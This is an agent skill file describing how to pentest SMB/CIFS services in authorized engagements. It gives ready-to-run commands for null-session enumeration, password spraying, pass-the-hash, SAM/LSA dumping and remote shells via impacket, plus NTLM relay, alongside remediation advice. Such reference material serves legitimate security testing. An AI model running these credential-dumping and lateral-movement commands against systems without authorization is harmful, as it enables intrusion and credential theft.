pentesting-smb - SKILL.md Agent Skill

name: pentesting-smb description: Testing SMB/CIFS file-sharing services (TCP 445, and 139 over NetBIOS) on Windows and Samba hosts during authorized engagements. Covers share enumeration, null/guest session abuse, user and RID enumeration, credentialed access with netexec/crackmapexec, password spraying, command execution (psexec/wmiexec/smbexec/atexec), SAM/LSA dumping, and notable CVEs such as EternalBlue (MS17-010). domain: cybersecurity subdomain: network-services-pentesting tags:

penetration-testing
network-services
smb
cifs
active-directory
lateral-movement version: '1.0' author: xalgorix license: Apache-2.0

Pentesting SMB (port 445/139)

When to Use

During authorized internal network or Active Directory penetration tests when TCP 445 or 139 is open
When you need to enumerate shares, users, groups, and the domain password policy
When testing for anonymous/null sessions, guest access, and default credentials
When you have credentials (or NT hashes) and want to access shares, dump secrets, or move laterally
When assessing Samba servers on Linux/Unix for dangerous smb.conf misconfigurations

Quick Enumeration

# Version and vuln scan (also fingerprints OS)
nmap --script "safe or smb-enum-*" -p 445 <IP>
nmap --script smb-os-discovery,smb-security-mode,smb2-security-mode -p 445 <IP>
nmap --script smb-vuln-ms17-010 -p 445 <IP>          # EternalBlue check

# Full enumeration via null/anon IPC$ session
enum4linux -a <IP>
enum4linux-ng -A [-u "<username>" -p "<passwd>"] <IP>

# netexec / crackmapexec (the modern workhorse)
netexec smb <IP>                                     # banner, signing, domain, OS
crackmapexec smb <IP> -u '' -p '' --shares           # null session shares
crackmapexec smb <IP> -u 'guest' -p '' --shares      # guest session shares

# rpcclient null session
rpcclient -U "" -N <IP>

Critical: Checks Most Often Missed

Null / anonymous session on IPC$ — connect with empty user and password. Often still yields OS info, parent domain, users, groups, shares, and the password policy via enum4linux/enum4linux-ng.
Guest account access — guest with a blank password frequently lists shares even when null does not.
SMB signing not required — enables SMB relay (NTLM relay) attacks. netexec smb <IP> reports signing:False.
EternalBlue (MS17-010) — unpatched SMBv1 remote code execution. Confirm with nmap --script smb-vuln-ms17-010 or crackmapexec smb <IP> -M ms17-010. Do NOT run the exploit without explicit written authorization; the kernel pool overflow can crash the host.
Readable SYSVOL/NETLOGON — readable by all authenticated domain users. Hunt for Registry.xml (GPP autologon passwords), web.config, and logon scripts with embedded creds. Also test write access even on "read-only"-looking shares (NTFS ACLs may allow writes → logon-script poisoning).
NTFS vs share ACL mismatch — a share that looks read-only may still allow file writes. Always test by uploading a small file.

How to CONFIRM: a null session is confirmed when smbclient -U '%' -N \\\\<IP>\\IPC$ -c '' returns no error, or crackmapexec smb <IP> -u '' -p '' --shares lists shares. Treat NT_STATUS_ACCESS_DENIED as "share exists, no access" and NT_STATUS_BAD_NETWORK_NAME as "share does not exist."

Workflow

Step 1: Enumerate (shares, users, domain info)

# Shares (try null, then guest, then creds)
smbclient --no-pass -L //<IP>                         # null user
smbmap -H <IP>                                        # null user, shows perms
crackmapexec smb <IP> -u '' -p '' --shares

# Users / groups / password policy
crackmapexec smb <IP> --users [-u <user> -p <pass>]
crackmapexec smb <IP> --groups [-u <user> -p <pass>]
crackmapexec smb <IP> -u <user> -p <pass> --pass-pol
rpcclient -U "" -N <IP> -c 'enumdomusers'
rpcclient -U "" -N <IP> -c 'enumdomgroups'

# RID cycling / SID lookup to recover usernames
lookupsid.py -no-pass <DOMAIN>/@<IP>
crackmapexec smb <IP> -u 'guest' -p '' --rid-brute

Step 2: Authenticate (null session, default creds, password spray)

# Default / weak creds worth trying: blank, guest/blank, admin/(blank|password|admin)

# Validate a single credential pair
crackmapexec smb <IP> -u 'user' -p 'Password1'         # (+) = valid, Pwn3d! = admin

# Password spray across a user list (mind lockout policy!)
crackmapexec smb <IP> -u users.txt -p 'Spring2024!' --continue-on-success

# Pass-the-Hash
crackmapexec smb <IP> -u Administrator -H <NTHASH>
smbmap -u "username" -p "<NT>:<LM>" -H <IP>            # PtH with smbmap

# Kerberos auth (NTLM disabled environments → STATUS_NOT_SUPPORTED)
sudo ntpdate <dc.fqdn>                                 # avoid KRB_AP_ERR_SKEW
netexec smb <dc.fqdn> -k                               # use ccache TGT
smbclient --kerberos //ws01.domain.com/C$

Step 3: Exploit / Extract (share access, secrets dumping)

# Connect to a share and pull files
smbclient --no-pass //<IP>/<Share>
smbclient //<IP>/<share> -c 'recurse; prompt; mget *'  # download everything
smbmap -R <Share> -H <IP> -A '<FileName>' -q           # search + download

# Try common hidden shares
smbclient -U '%' -N \\\\<IP>\\ADMIN$                    # also C$, IPC$, SYSVOL, NETLOGON

# Spider shares for secrets
crackmapexec smb <IP> -u user -p pass -M spider_plus --share 'Department Shares'

# Dump credentials with valid (admin) creds
crackmapexec smb <IP> -u Administrator -p 'pass' --sam   # local SAM hashes
crackmapexec smb <IP> -u Administrator -p 'pass' --lsa   # LSA secrets
secretsdump.py [[domain/]username[:password]@]<IP>       # impacket full dump

# Remote registry read
reg.py domain.local/USERNAME@<IP> -hashes <LM:NT> query -keyName HKLM -s

Step 4: Post-access / lateral movement

# Command execution (wmiexec = default for CME; fileless options)
crackmapexec smb <IP> -u Administrator -p 'pass' -x whoami
crackmapexec smb <IP> -u Administrator -H <NTHASH> -x whoami
# --exec-method {mmcexec,smbexec,atexec,wmiexec}

# Impacket interactive shells (kali: /usr/share/doc/python3-impacket/examples/)
psexec.py [[domain/]username[:password]@]<IP>            # new service via \pipe\svcctl
wmiexec.py [[domain/]username[:password]@]<IP>           # DCOM via port 135, fileless
smbexec.py [[domain/]username[:password]@]<IP>           # cmd/powershell via service
atexec.py  [[domain/]username[:password]@]<IP> "whoami"  # Task Scheduler \pipe\atsvc
# All support -hashes <LM:NT> for PtH and -k for Kerberos

# SMB relay (when signing not required) — capture + relay NTLM
ntlmrelayx.py -tf targets.txt -smb2support

Key Concepts

Concept	Description
SMB / CIFS	Application-layer protocol for shared access to files, printers, and named pipes; runs on TCP 445 (direct) or 139 (NetBIOS)
Null session	Anonymous IPC$ connection with empty username/password; exposes services over named pipes
IPC$	Inter-process communication share used to interact with named pipes (lsarpc, samr, srvsvc)
Pass-the-Hash (PtH)	Authenticating with an NT hash instead of a cleartext password
SMB signing	Integrity protection; when not required, NTLM relay attacks become possible
RID cycling	Enumerating users by brute-forcing relative IDs (500–~1100) via SID lookups
SYSVOL/NETLOGON	Domain shares readable by authenticated users; common source of GPP/script credentials
EternalBlue (MS17-010)	SMBv1 kernel pool overflow giving unauthenticated remote code execution

Tools & Systems

Tool	Purpose
nmap (smb-* NSE)	Version detection, security mode, MS17-010 vuln check
netexec / crackmapexec	Share/user/group enum, spraying, PtH, secrets dump, command exec
enum4linux-ng	Aggregated null-session enumeration (OS, domain, users, shares, policy)
rpcclient	Manual MSRPC queries (enumdomusers, enumdomgroups, queryuser)
smbclient / smbmap	Share listing, file transfer, recursive search and download
impacket	psexec/wmiexec/smbexec/atexec, secretsdump, samrdump, lookupsid, reg, ntlmrelayx
Snaffler / ShareHound	Automated discovery of sensitive files and share ACLs across the domain

Common Scenarios

Scenario 1: Anonymous Enumeration

A host allows null sessions. enum4linux-ng -A <IP> reveals the domain name, full user list, group memberships, and password policy — providing a user list for targeted password spraying.

Scenario 2: GPP Password in SYSVOL

A domain user can read \\<dc>\SYSVOL\<domain>\Policies\...\Registry.xml containing an autologon password configured via Group Policy, granting workstation access.

Scenario 3: Pass-the-Hash Lateral Movement

A dumped local Administrator NT hash is reused across the subnet. crackmapexec smb <subnet> -u Administrator -H <hash> flags hosts as Pwn3d!, and wmiexec.py -hashes :<hash> Administrator@<IP> yields a shell.

Scenario 4: EternalBlue Target

nmap --script smb-vuln-ms17-010 flags an unpatched server. With written authorization, the host is exploited for SYSTEM-level RCE; otherwise it is reported as a critical finding only.

Output Format

## SMB Finding

**Service**: SMB/CIFS
**Severity**: <Critical|High|Medium|Low>
**Host**: <IP>:445
**Access Level**: <null | guest | authenticated | admin>

### Summary
<What was found: null session, weak creds, MS17-010, exposed share, etc.>

### Evidence
- Command: <exact command run>
- Output: <relevant signature, e.g. share list, "Pwn3d!", root: line, MS17-010 VULNERABLE>

### Affected Resources
| Share / Object | Access | Notable Contents |
|----------------|--------|------------------|
| SYSVOL | read | Registry.xml with GPP password |
| C$ | read/write (admin) | full filesystem |

### Reproduction Steps
1. <step>
2. <step>

### Recommendation
1. Disable null/anonymous sessions and the guest account
2. Require SMB signing on all hosts
3. Patch MS17-010 / disable SMBv1
4. Remove credentials from SYSVOL scripts and GPP; rotate exposed secrets
5. Enforce strong, unique local administrator passwords (LAPS)